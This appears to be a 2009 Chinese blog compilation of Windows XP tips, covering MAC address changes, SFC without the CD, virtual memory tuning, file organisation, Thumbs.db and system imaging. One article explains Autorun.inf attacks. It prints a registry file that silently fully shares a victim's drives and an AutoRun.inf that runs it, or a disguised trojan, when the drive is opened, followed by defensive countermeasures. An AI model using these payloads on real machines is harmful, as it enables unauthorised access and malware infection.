读者可以在桌面上的“网上邻居”图标上单击右键，选择“属性”，在弹出的“网络连接”的对话框中，在“本地连接”图标上单击右键，选择“属性”，会弹出一个“本地连接属性”的对话框，单击“配置”按钮，选择“高级”，选中左栏“属性”中“Network Address”(其实，并非所有的网卡，对物理地址的描述都用“Network Address”，如Intel的网卡便用“Locally Administered Address”来描述，只要在右栏框中可以找到“值”这个选项就可以了)，然后选中右栏框“值”中的上面一个单选项(非“不存在”)，此时便可在右边的框中输入想改的网卡MAC地址，形式如“000B6AF6F4F9”。点击“确定”按钮，修改就完成了。 不过，有一些网卡没有这个选项，不要着急，可以先更新网卡的驱动程序试试，一般情况下，更新驱动之后都会出现这个选项。但是依然有特殊情况，无论怎么修改都没有这个选项，那怎么办呢,接着往下看，下面的方法可以说是万能 的～ 注册表修改方法 第,步，单击“开始”，选中“运行”，键入“regedit”调出注册表。 第,步，在 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E 325-11CE-BFC1-08002BE10318}\0000、0001、0002 等主键下，查找 DriverDesc ， 内容为要修改的网卡的描述，如Intel的网卡会被描述成“Intel(R) PRO/100+ Management Adapter”，3Com的网卡会被描述成“3Com EtherLink XL 10/100 PCI For Complete PC Management NIC (3C905C-TX)”等。 注:上面提到的关于网卡描述的选项出现的位置，和网卡本身以及操作系统 有关。不同的网卡可能出现在不同的主键下，而同一网卡用不同版本的操作系统 (如,,,版，,,,或者,,,等)也会出现在不同的位置。而这一步的任务就 是找到含有网卡描述的主键。 第,步，选中在第二步找到的主键，在右栏框中添加一个字符串，命名为 “Network Address”，其值设为要改的MAC 地址，形式如“000B6AF6F4F9”。 注:到这一步，修改网卡物理地址的任务可以说是完成了，有的网卡需要重 启以下才能正常的工作，而有的只需一点点的时间“反应”一下而已。下面的几 步是为了以后再修改物理地址方便用的，如果读者不再需要再次修改，到这里可 以止步了。 第,步，在“第一步选中的主键”\Ndi\params下添加一项名为 “NetworkAddress”的主键，此时一般都会随着在右栏框中产生一个“(默认)”的字符串，将其值设置为最终想要修改的MAC地址，形式如“000B6AF6F4F9”。如果没有此字符串，读者也可自行添加此字符串。 注:此步骤就是为网卡设置一个初始,,,地址。 第,步，在“NetworkAddress”的主键下继续添加名为“ParamDesc”的字符串，其作用为指定“NetworkAddress”主键的描述，其值可自己命名，如“Network Address”，这样在网卡的高级属性中就会出现“Network Address”选项，就是刚在注册表中加的新项“NetworkAddress”，以后只要在此修改MAC地址就可以了。 第,步，在“NetworkAddress”的主键下继续添加名为“Optional”的字符串，其值设为“1”，则以后在网卡的高级属性中选择“Network Address”项时，右边会出现“不存在”选项。 第,步，重新启动计算机(不是一定要重新启动，但要视不同网卡的要求而 定，不过，重启没有任何差错。)，按照第一种方法找到“高级”选项就可发现此时“属性”栏中已有“Network Address”的选项，现在读者可以用来直接修 改MAC地址或恢复原来的地址。 ?博弈圣 ? 不放光盘让Windows系统自动修复受损文件 2009-02-08 15:36:59 被57人转藏 | 小贴士:我很喜欢这个口袋，我能订阅它么? 当系统意外重启或者非法关机，系统文件受损后。系统总是会提示让我们放入Windows XP光盘，进行系统文件修复。我也常常遇到这种问题。如何解决这个问题? 其实完全可以通过修改注册表，让系统的自动修复通过硬盘上的Windows XP安装文件来进行。这样就可以避免放入光盘。 方法如下:假设xp安装文件在D:\XP下。修改注册表 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup] 主键。 首先在右边将CDInstall的键值数据修改为0。然后再分别将ServicePack SourcePath 和SourcePath两个键值都修改为D:\XP。 然后再运行sfc /scannow。系统就会自动进行系统文件的修复。而不会要求放入光盘了。 ?博弈圣 ? 细说Windows XP虚拟内存优化 2009-02-08 15:36:27 被54人转藏 | 小贴士:网络潮人的流行用语，你懂多少, 虚拟内存在Windows XP中是非常不起眼的，Windows XP安装时会自动对其进行设置，用户甚至根本不必理会这个文件。但是虚拟内存作为物理内存的补充和延伸，对Windows XP的稳定运行起着举足轻重的作用，如果设置不好，会影响计算机的整体性能。 什么是虚拟内存, 虚拟内存是Windows XP为作为内存使用的一部分硬盘空间。即便物理内存很大，虚拟内存也是必不可少的。虚拟内存在硬盘上其实就是为一个硕大无朋的文件，文件名是PageFile.Sys，通常状态下是看不到的。必须关闭资源管理器对系统文件的保护功能才能看到这个文件。虚拟内存有时候也被称为是“页面文件”就是从这个文件的文件名中来的。 设置硬盘 优化虚拟内存，为什么要进行硬盘设置,这是因为虚拟内存文件(也就是常说的页面文件)存放在硬盘上，提高硬盘性能也可以在一定程度上提高内存的性能。 1. 启用磁盘写入缓存 在“我的电脑”上单击鼠标右键选择“属性->硬件”，打开设备管理器找到当前正在使用的硬盘，单击鼠标右键选择属性。在硬盘属性的的“策略”页中，打开“启用磁盘上的写入缓存”。 这个选项将会激活硬盘的写入缓存，从而提高硬盘的读写速度。不过要注意一点，这个功能打开后，如果计算机突然断电可能会导致无法挽回的数据丢失。因此最好在有UPS的情况下再打开这个功能。当然，如果你平常使用计算机时不要进行什么重要的数据处理工作，没有UPS也无所谓，这个功能不会对系统造成太大的损失 2. 打开Ultra MDA 在设备管理其中选择IDE ATA/ATAPI控制器中的“基本/次要IDE控制器”，单击鼠标右键选择“属性”，打开“高级设置”页。这里最重要的设置项目就是“传输模式”，一般应当选择“DMA(若可用)”。 3. 配置恢复选项 Windows XP 运行过程中碰到致命错误时会将内存的快照保存为一个文件，以便进行系统调试时使用，对于大多数普通用户而言，这个文件是没有什么用处的，反而会影响虚拟内存的性能。所以应当将其关闭。 在“我的电脑”上单击鼠标右键，选择“属性->高级”，在“性能”下面单击“设置”按钮，在“性能选项”中选择“高级”页。这里有一个“内存使用”选项，如果将其设置为“系统缓存”，Windows XP 将使用约4MB的物理内存作为读写硬盘的缓存，这样就可以大大提高物理内存和虚拟内存之间的数据交换速度。默认情况下，这个选项是关闭的，如果计算机的物理内存比较充足，比如 256M或者更多，最好打开这个选项。但是如果物理内存比较紧张，还是应当保留默认的选项。 页面文件的设置 页面文件的大小计算 对于不同的计算机而言，页面文件的大小是各不相同的。关于页面文件大小的设置，有两个流传甚广的“公式”，“物理内存X2.5”或者“物理内存X1.5”。这两种计算方法固然简便，但是并不适用于所有的计算机。设置页面文件大小最准确的方法是看看计算机在平常运行中实际使用的页面文件大小。 通过Windows XP自带的日志功能可以监视计算机平常使用的页面文件的大小，从而进行最准确的设置，具体步骤如下。 一、在“我的电脑”上单击鼠标右键，选择“属性->高级”，单击“性能”下面的“设置”按钮，然后选择“高级”页，单击“虚拟内存”下方的“更改”按钮。选择“自定义大小”，并将“起始大小”和“最大值”都设置为300M，这只是一个临时性的设置。设置完成后重新启动计算机使设置生效。 二、进入“控制面板->性能与维护->管理工具”，打开“性能”，展开“性能日志和警告”，选择“计数器日志”。在窗口右侧单击鼠标右键选择“新建日志设置”; 三、随便设置一个日志名称，比如“监视虚拟内存大小”; 四、在“常规”页中单击“添加计数器”按钮; 在“性能对象”中选择“Paging File”，然后选中“从列表选择记数器”下面的“%Usage Peak”，并在右侧“从列表中选择范例”中选择“_Total”。最后 单击“添加”和“关闭”按钮。 五、别忘了记住“日志文件”页中的日志文件存放位置和文件名，我们后面需要查看这个日志来判断Windows XP平常到底用了多少虚拟内存，在这个例子中，日志文件被存放在D:\Perflog目录下;另外还要设置“日志文件类型”为“文本文件”，这样便于阅读。这时你可以看到刚才新建的日志条目前面的图标变成了绿色，这表明日志系统已经在监视虚拟内存了。如果图标还是红色，你应该单击鼠标右键选择“开始”来启动这个日志。 这个日志文件记录这一段时间中页面文件的使用情况，注意这里的单位是%，而不是MB。通过简单的计算，我们就可以得到页面文件的最小尺寸，公式是“页面文件尺寸X百分比”。比如这个例子中，虚拟内存最大的使用比率是31%， 300MBX31%=93MB，这个值就是虚拟内存的最小值(注意，300MB是前面的设置的临时值)。 如果物理内存较大，可以考虑将页面文件的“起始大小”和“最大值”设置为相等，等于上一步中计算出来的大小。这样硬盘中不会因为页面文件过渡膨胀产生磁盘碎片，其副作用是由于“最大值”被设置的较小，万一偶然出现虚拟内存超支的情况，可能会导致系统崩溃。 设置页面文件 现在回到“虚拟内存”的设置对话框中选择自定义大小并按照上面的计算结果分别设置“初始大小”和“最大值”。这里我们将“初始大小”设置为91M，而将“最大值”设置成了200M，这样比较保险。 对页面文件进行碎片整理 Windows XP运行时需要大量访问页面文件，如果页面文件出现碎片，系统性能将会受到严重影响，而且会缩短硬盘的使用寿命。所以我们很有必要对页面文件定期进行碎片整理。 不过别忘了，页面文件是系统关键文件，Windows XP运行时无法对其进行访问。所以对它进行碎片整理并不是一件容易的事情。我们有两种方案可以选择，一是安装Windows双系统，然后启动另外一个Windows对Windows XP所在的分区进行碎片整理。二是使用专门的工具软件，比如System File Defragmenter 等。 Windows中管理文件的方法 2009-02-08 14:05:27 被21人转藏 | 小贴士:测试:你在别人眼中的真相，很真实～ 文件管理的真谛在于方便保存和迅速提取，所有的文件将通过文件夹分类被很好地组织起来，放在你最能方便找到的地方。解决这个问题目前最理想的方法就是分类管理，从硬盘分区开始到每一个文件夹的建立，我们都要按照自己的工作和生活需要，分为大大小小、多个层级的文件夹，建立合理的文件保存架构。此外所有的文件、文件夹，都要规范化地命名，并放入最合适的文件夹中。这样，当我们需要什么文件时，就知道到哪里去寻找。这种方法，对于相当数量的人来说，并不是一件轻松的事，因为他们习惯了随手存放文件和辛苦、茫无头绪地查找文件。下面，我们将帮你制订一套分类管理的原则，并敦促您养成好的文件管理习惯。以下是我们总结出的一些基本技巧，这些技巧并不是教条，可能并不适合你， 但无论如何你必须要有自己的规则，并坚持下来，形成习惯。 第一招 发挥我的文档的作用 有很多理由让我们好好地利用“我的文档”，它能方便地在桌面上、开始菜单、资源管理器、保存/打开窗口中找到，有利于我们方便而快捷地打开、保存文件。我们可以利用“我的文档”中已有的目录，也可以创建自己的目录，将经常需要访问的文件存储在这里。至于“我的文档”存储在C盘，在重装系统时可能会误删除的问题，可以在非系统盘建立一个目录，然后右击桌面上的“我的文档”，选择“属性”。在弹出的“我的文档 属性”窗口中，单击目标文件夹下的“移动”按钮，然后在新的窗口中指定我们刚创建的文件夹。重装系统后再次执行以上操作，再重新指向此文件夹即可，即安全又便捷。 提示:如果你使用Windows 2000/XP，则移动“我的文档”文件夹时，其下的所有文件会自动移过去，但如果你使用Windows 9x，则需要手工将C:\My Documents下的所有文件手工移到新指定的文件夹中，否则可能会丢失数据。 第二招 建立最适合自己的文件夹结构 文件夹是文件管理系统的骨架，对文件管理来说至关重要。建立适合自己的文件夹结构，需要首先对自己接触到的各种信息、工作和生活内容进行归纳分析。每个人的工作和生活有所不同，接受的信息也会有很大差异，因此分析自己的信息类别是建立结构的前提。比如，有相当多的IT自由撰稿人和编辑就是以软件、硬件的类别建立文件夹;而很多老师，就是以自己的工作内容比如教学工作、班主任工作建立文件夹。 同类的文件名字可用相同字母前缀的文件来命名，同类的文件最好存储在同一目录，如图片目录用image，多媒体目录用media，文档用doc等等，简洁易懂，一目了然，而且方便用一个软件打开。这样，当我们想要找到一个文件时，能立刻想到它可能保存的地方。 第三招 控制文件夹与文件的数目 文件夹里的数目不应当过多，一个文件夹里面有50个以内的文件数是比较容易浏览和检索的。如果超过100个文件，浏览和打开的速度就会变慢且不方便查看了。这种情况下，就得考虑存档、删除一些文件，或将此文件夹分为几个文件或建立一些子文件夹。另一方面，如果有文件夹的文件数目长期只有少得可怜的几个文件，也建议将此文件夹合并到其他文件夹中。 第四招 注意结构的级数 分类的细化必然带来结构级别的增多，级数越多，检索和浏览的效率就会越低，建议整个结构最好控制在二、三级。另外，级别最好与自己经常处理的信息相结合。越常用的类别，级别就越高，比如负责多媒体栏目的编辑，那多媒体这 个文件夹就应当是一级文件夹，老师本学期所教授的课程、所管理班级的资料文件夹，也应当是一级文件夹。文件夹的数目，文件夹里文件的数目以及文件夹的层级，往往不能两全，我们只能找一个最佳的结合点。 第五招 文件和文件夹的命名 为文件和文件夹取一个好名字至关重要，但什么是好名字，却没有固定的含义，以最短的词句描述此文件夹类别和作用，能让你自己不需要打开就能记起文件的大概内容，能就是好的名称。要为电脑中所有的文件和文件夹使用统一的命名规则，这些规则需要我们自己来制订。最开始使用这些规则时，肯定不会像往常一样随便输入几个字那样轻松，但一旦你体会到了规则命名方便查看和检索的好处时，相信你会坚持不懈地执行下去。 另外，从排序的角度上来说，我们常用的文件夹或文件在起名时，可以加一些特殊的标示符，让他们排在前面。比如当某一个文件夹或文件相比于同一级别的来说，要访问次数多得多时，笔者就会在此名字前加上一个“1”或“?”，这可以使这些文件和文件夹排列在同目录下所有文件的最前面，而相对次要但也经常访问的，就可以加上“2”或“??”，以此类推。 此外，文件名要力求简短，虽然Windows已经支持长文件名了，但长文件名也会给我们的识别、浏览带来混乱。 第六招 注意分开要处理的与已经完成的 如果一年前的文件还和你现在正要处理的文件摆在一起，如果几个月前的邮件还和新邮件放在一块，那你将会很难一眼找到你想要的东西。及时地处理过期的文件，备份该备份的，删除不需要的，是一个良好的习惯。以老师为例，上学期教授课程的与资料，本学期使用的频率会非常小，所以应当专门将到存放后另一个级别较低的文件夹中，甚至于刻录到光盘中。而并本学期的一些文档，因为要经常访问，最好放置在“我的文档”中以方便时时访问。对于老师来说，一个学期就是一个周期，过一个周期，就相应地处理本周期的文件夹。对于其他行业的人来说，也有不同的周期，我们要根据自己的实际工作和生活需要对文件夹、文件进行归档。 小提示:为了数据安全，及时备份是必需要的，要及时备份文件并删除不需要再使用的文件。 第七招 发挥快捷方式的便利 如果我们经常要快速访问文件或文件夹，那可以右击选择“创建快捷方式”，再将生成的快捷方式放置到你经常停留的地方。当然，当文件和文件夹不再需要经常访问时，你需要及时将快捷方式删除，以免快捷方式塞堵了太多空间或牵扯了你的注意力。 第八招 现在开始与长期坚持 建立完善的结构、规范化地命名、周期性地归档，这就是我们要做的。这并 不复杂的操作却能大大提高我们的工作效率，节省我们已经很有限的时间。解析来自Autorun.inf文件的攻击 2009-02-08 14:04:46 被30人转藏 | 小贴士:测试:你对别人的重要性和利用率 最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法，由于AutoRun.inf文件在黑客技术中的应用还是很少见的，相应的资料也不多，有很多人对此觉得很神秘，本文试图为您解开这个迷，使您能完全的了解这个并不复杂却极其有趣的技术。 一、理论基础 经常使用光盘的朋友都知道，有很多光盘放入光驱就会自动运行，它们是怎么做的呢,光盘一放入光驱就会自动被执行，主要依靠两个文件，一是光盘上的AutoRun.inf文件，另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作，如果有的话，便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。 AutoRun.inf不光能让光盘自动运行程序，也能让硬盘自动运行程序，方法很简单，先打开记事本，然后用鼠标右键点击该文件，在弹出菜单中选择“重命名”，将其改名为AutoRun.inf，在AutoRun.inf中键入以下内容: [AutoRun] //表示AutoRun部分开始，必须输入 Icon=C:\C.ico //给C盘一个个性化的盘符图标C.ico Open=C:\1.exe //指定要运行程序的路径和名称，在此假设为C盘下的1.exe 保存该文件，按F5刷新桌面，再看“我的电脑”中的该盘符(在此为C盘)，你会发现它的磁盘图标变了，双击进入C盘，还会自动播放C盘下的1.exe文件～ 解释一下:“[AutoRun]”行是必须的固定格式，“Icon”行对应的是图标文件，“C:\C.ico”为图标文件路径和文件名，你在输入时可以将它改为你的图 片文件所在路径和文件名。另外，“.ico”为图标文件的扩展名，如果你手头上没有这类文件，可以用看图软件ACDSee将其他格式的软件转换为ico格式，或者找到一个后缀名为BMP的文件，将它直接改名为ICO文件即可。 “Open”行指定要自动运行的文件及其盘符和路径。要特别说明的是，如果你要改变的硬盘跟目录下没有自动播放文件，就应该把“OPEN”行删掉，否则就会因为找不到自动播放文件而打不开硬盘，此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。 二、实例 下面就举个例子:如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个注册表文件，打开记事本，键入以下内容: REGEDIT4 '此处一定要空一行 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network \Lanman\C$] "ath"="C:\\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "armlenc"=hex: "arm2enc"=hex: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network \Lanman\D$] "ath"="D:\\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "armlenc"=hex: "arm2enc"=hex: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network \Lanman\C$] "ath"="E:\\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000302 "armlenc"=hex: "arm2enc"=hex: 以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。 然后打开记事本，编制一个AutoRun.inf文件，键入以下内容: [AutoRun] Open=regedit/s Share.reg //加/s参数是为了导入时不会显示任何信息 保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下，这样对方只要双击D盘就会将Share.reg导入注册表，这样对方电脑重启后所有驱动器就会都完全共享出来。 如果想让对方中木马，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木马服务端文件名”，然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下，这样不需对方运行木马服务端程序，而只需他双击D盘就会使木马运行～这样做的好处显而易见，那就是大大的增加了木马运行的主动性～须知许多人现在都是非常警惕的，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。 要说明的是，给你下木马的人不会那么蠢的不给木马加以伪装，一般说来，他们会给木马服务端文件改个名字，或好听或和系统文件名很相像，然后给木马换个图标，使它看起来像TXT文件、ZIP文件或图片文件等，，最后修改木马的资源文件使其不被杀毒软件识别(具体的方法可以看网上的文章)，当服务端用户信以为真时，木马却悄悄侵入了系统。其实，换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了～ 请大家注意:保存的文件名必须是“AutoRun.inf”，编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步，如果你的某个硬盘内容暂时比较固定的话，不妨用Flash做一个自动播放文件，再编上“Autorun”文件，那你就有最酷、最个性的硬盘了。 到这儿还没有完。大家知道，在一些光盘放入后，我们在其图标上单击鼠标右键，还会产生一个具有特色的目录菜单，如果能对着我们的硬盘点击鼠标右键也产生这样的效果，那将更加的有特色。其实，光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句: shell\标志,显示的鼠标右键菜单中内容 shell\标志\command,要执行的文件或命令行 所以，要让硬盘具有特色的目录菜单，在AutoRun.inf文件中加入上述语句即可 三、防范方法 共享分类完全是由flags标志决定的，它的键值决定了共享目录的类型。当flags=0x302时，重新启动系统，目录共享标志消失，表面上看没有共享，实际上该目录正处于完全共享状态。网上流行的共享蠕虫，就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402，就可以看到硬盘被共享了，明白了吗,秘密就在这里～ 以上代码中的Parmlenc、Parm2enc属性项是加密的密码，系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算，要想求出密 码再进行一次异或运算，然后查ASCII表可得出目录密码。在网络软件中有一款软件就利用该属性进行网络密码破解的，在局域网内从一台机器上可以看到另一台计算机的共享密码。 利用TCP/IP协议设计的Nethacker?软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。 解决办法是把 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\ LanMan下面的“C$”、“D$”、“E$”等删掉。然后删除windows\system\下面的Vserver.vxd删除，它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序，再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver键值删掉，就会很安全了。 另外，关闭硬盘AutoRun功能也是防范黑客入侵的有效方法之一。具体方法是在“开始”菜单的“运行”中输入Regedit，打开注册表编辑器，展开到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Exploer主键下，在右侧窗格中找到“NoDriveTypeAutoRun”，就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。 双击“NoDriveTypeAutoRun”，在默认状态下(即你没有禁止过AutoRun功能)，在弹出窗口中可以看到“NoDriveTypeAutoRun”默认键值为95,00,00,00，其中第一个值“95”是十六进制值，它是所有被禁止自动运行设备的和。将“95”转为二进制就是10010101，其中每位代表一个设备，Windows中不同设备会用如下数值表示: 设备名称 第几位 值 设备用如下数值表示 设备名称含义 DKIVE_UNKNOWN 0 1 01h 不能识别的设备类型 DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器(Drive without root directory) DRIVE_REMOVABLE 2 1 04h 可移动驱动器 (Removable drive) DRIVE_FIXED 3 0 08h 固定的驱动器(Fixed drive) DRIVE_REMOTE 4 1 10h 网络驱动器(Network drive) DRIVE_CDROM 5 0 20h 光驱(CD-ROM) DRIVE_RAMDISK 6 0 40h RAM磁盘(RAM Disk) 保留 7 1 80h 未指定的驱动器类型(Not yet specified drive disk) 在上面所列的表中值为“0”表示设备运行，值为“1”表示该设备不运行(默认情况下，Windows禁止80h、10h、4h、01h这些设备自动运行，这些数值累加正好是十六进制的95h，所以NoDriveTypeAutoRun”默认键值为 95,00,00,00)。 由上面的分析不难看出，在默认情况下，会自动运行的设备是 DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保留设备，所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED的值设为1，这是因为DRIVE_FIXED代表固定的驱动器，即硬盘。这样一来，原来的10010101(在表中“值”列中由下向上看)就变成了二进制的10011101，转为十六进制为9D。现在，将“NoDriveTypeAutoRun”的键值改为9D,00,00,00后关闭注册表编辑器，重启电脑后就会关闭硬盘的AutoRun功能。 如果你看明白了，那你肯定知道该怎样禁止光盘AutoRun功能了，对～就是将DRIVE_CDROM设为1，这样“NoDriveTypeAutoRun”键值中的第一个值就变成 了10110101，也就是十六进制的B5。将第一个值改为B5后关闭注册表编辑器，重启电脑后就会关闭CDROM的Autorun功能。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将 “NoDriveTypeAutoRun”的键值改为:BD,00,00,00即可。 如果想要恢复硬盘或光驱的AutoRun功能，进行反方向操作即可。 事实上，大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序，因此我们完全可以将硬盘的AutoRun功能关闭，这样即使在硬盘根目录下有AutoRun.inf这个文件，Windows也不会去运行其中指定的程序，从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。 除此以外，我们还应让Windows能显示出隐藏的共享。大家都知道，在Windows 9X中设置共享时，通过在共享名后加上“$”这个符号，可使共享隐藏。比如，我们给一个名为share的计算机的C盘设置共享时，只要将其共享名设为C$。这样我们将看不到被共享的C盘，只有通过输入该共享的确切路径，才能访问此共享。不过我们只要用将电脑中的msnp32.dll文件稍做修改。就可以让Windows显示出隐藏的共享。 由于在Windows下msnp32.dll会被调用，不能直接修改此文件，所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32，msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32，找到“24 56 E8 17”(位于偏移地址00003190,000031A0处)，找到后将“24”改为“00”，然后保存，关闭UltraEdit。重启计算机进入DOS模式，在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll，重启进入Windows，现在双击share就能看见被隐藏的共享了。 最后要提醒大家利用TCP/IP协议设计的Nethacker?等黑客软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。防范这类事情发生的方法无非是经常检查系统，给系统打上补丁，经常使用反黑杀毒软件，上网时打开防火墙，注意异常现象，留意AutoRun.inf文件的内容，关闭共享或 不要设置为完全共享，且加上复杂的共享密码。 声明:本文的目的是使大家能清楚地了解网上流行的黑客手段，增强自己的防护意识，因此请大家不要用本文的方法去干违法的事情，切记:己所不欲，勿 施于人～ 将系统中的“病毒”Thumbs.db一网打尽 2009-02-08 14:04:10 被37人转藏 | 小贴士:来挑战一下星爷的经典台词吧? 不少朋友发现在有图片的文件夹里有个隐藏的Thumbs.db文件，可删除，但之后又会重新生成，这个东东到底是什么呢,病毒, 当然不是，Thumbs.db是Windows XP、Server 2003和Mac OS X中存储图片(JPEG, BMP, GIF, TIF)及一些文档(PDF, HTM)缩略图的缓存文件。Thumbs.db一般在Windows资源管理器以缩略图或幻灯方式查看这些文件时产生，并保存在各自的目录中。Thumbs.db只是一个图片索引文件，它可以加速你用缩略图方式查看图片，会随着文件夹的图片的增多也体积增大。本来只要你硬盘够大，这个文件也没什么影响，但很多朋友在上传东西到服务器时，往往会不小心把这个文件也传了上去，有点不好。 从Windows 98开始，系统增加了图片预览功能，保存了图片的文件夹下会产生一个名为“Thumbs.db”的文件，这个文件会随着图片文件的增加而膨胀。奇怪的是，这个文件被删除后下次预览图片时它又会自动生成，有什么办法让它永远消失呢? Windows 9x/Me系统 用鼠标右键点击已开启缩略图功能的文件夹，通过弹出的快捷菜单打开“属性”对话框，在窗口中清空“启用缩略图查看方式”复选框前的“?”。 Windows 2000/XP/2003 系统 Windows 2000/XP/2003在默认情况下采用缩略图功能，但通过设置即可禁止在所有的图片文件夹中自动生成“Thumbs.db”文件:在“控制面板”中双击“文件夹选项”，在“文件夹选项”对话框中切换到“查看”标签，在“不缓存缩略图”复选框前打上“?”，再点击“确定”按钮退出即可。 Windows Vista 系统 但是，在Vista中，你可能找不到Thumbs.db，它们去哪了呢, 其实，Vista改变了缩略图的存储方式，它们被集中存储在一起，位置(Vista安装驱动器下，[User Account Name]代表当前用户名): \Users\[User Account Name]\AppData\Local\Microsoft\Windows\Explorer 这里，你可以看到类似于thumbcache_xxxx.db名称的文件，请注意，这些文件有的很大，可见已经积累了大量的内容，如果不需要可以直接删除它们。 经过上面的设置，以后所有的文件夹将不会自动生成“Thumbs.db”文件了，但原来已经生成的诸多“Thumbs.db”文件不会自动消失，必须手工将其删除。显然，一个一个地删除非常麻烦，我们可以利用以下方法将它们一网打尽: 打开资源管理器，点击工具栏上的“搜索”按钮，在左侧的“搜索助理”栏中点击“改变首选项”，在系统提示:“您想怎样使用搜索助理?”时，点击中间的“改变文件和文件夹搜索行为”，然后在“选择默认的文件和文件夹搜索行为”中选择“高级-包括手动输入搜索标准的选项”，点“确定”按钮即可看到很多高级选项。选中“搜索隐藏的文件和文件夹”前的复选框，接下来再搜索“Thumbs.db”文件吧，将搜索到的文件全部删除即可。 打造万能Windows封装包 2009-02-08 14:03:04 被37人转藏 | 小贴士:测试:你究竟是个什么样子的人, 对于那些经常需要给朋友攒机或者重新安装操作系统的电脑高手来说，每次安装Windows系统所经历的漫长等待无异于一次折磨。虽然身边有Ghost之类分区镜像软件，但是每台计算机配置不同造成Windows对于硬件的检测不一样，再加上Windows XP/2003独有的激活策略，这似乎使得Ghost没有了用武之地。其实这些并非没有解决之道，只要将自动应答文件和Ghost有机结合起来，我们也可以打造出一个适用于所有计算机的Windows封装包，这样仅需十分钟即可完成以前几个小时的繁琐安装了。 一、卸载驱动程序 大家都知道在第一次安装Windows的时候，系统会对当前计算机硬件进行检测，并且安装相应的驱动程序，因此对一个已经正常运行的Windows封包之前，需要卸载各种驱动程序，而这对最终得到的封装包是否能够运用在其它计算机中也是非常必要的。 1. 卸载硬件驱动程序 卸载硬件驱动程序并不是在设备管理器中随意卸载，必须要按照一定的顺序进行，通常我们可以参照网卡、USB设备、声卡、显卡、显示器等步骤进行。在卸载驱动程序的时候，首先从设备管理器中选取某个设备，接着右击鼠标并且从弹出菜单中选择“卸载”命令即可。 2. 更改ACPI属性 ACPI是高级电源管理的意思，虽然如今大部分计算机都支持ACPI功能，但是不同主板的ACPI类型不同，倘若你和别人所使用的计算机的ACPI不同，那么就会出现电脑无法软关机的故障，为此一定要更改ACPI属性。更改ACPI属性的时候，先从资源管理器中选择“计算机?ACPI Uniprocessor PC”，接着从鼠标 右键菜单中选择“更新驱动程序”命令，在出现的驱动程序更新向导中依次选择“从列表或指定位置安装?不要搜索，我要自己选择要安装的程序”，将ACPI类型更改为“Standard PC”一项即可。 3. 更改驱动器属性 在创建Windows封装包过程中，更改磁盘驱动器的属性非常重要，如果忽略这个步骤，那么其它计算机使用这个封装包安装Windows之后就会出现无法正常引导计算机，并且不断重新启动的故障。因此我们需要将IDE控制器更改为标准双通道的PCI IDE控制器，这样才能使其适用于如今各种不同类型的主板。首先从资源管理器的“IDE ATA/ATAPI控制器”中找到当前正在使用的IDE控制器，右击鼠标之后从弹出菜单中选择“更改驱动程序”命令，接着在出现的驱动程序更新向导中依次选择“从列表或指定位置安装?不要搜索，我要自己选择要安装的程序”，最后从窗口中选取“标准双通道PCI IDE控制器”一项即可。 完成上述三方面的驱动程序卸载之后，基本上就可以利用Windows的自动应答文件来创建封装包了。不过提醒大家注意的是，无论卸载硬件驱动程序还是更改相关的属性，完毕之后系统都会提示重新启动计算机，这时候切记不要选择重新启动计算机，而是在下面的重新封装过程中由程序自动关闭计算机，否则重新启动计算机之后系统会提示发现新硬件，又需要安装新的驱动程序了。 二、创建自动应答文件 熟悉Windows 9x/2000的朋友都知道，系统提供了一个隐藏的自动应答文件 程序，而Windows XP也有这个文件，借助它就可以非常便捷的完成自动应答文件的创建操作。首先从Windows 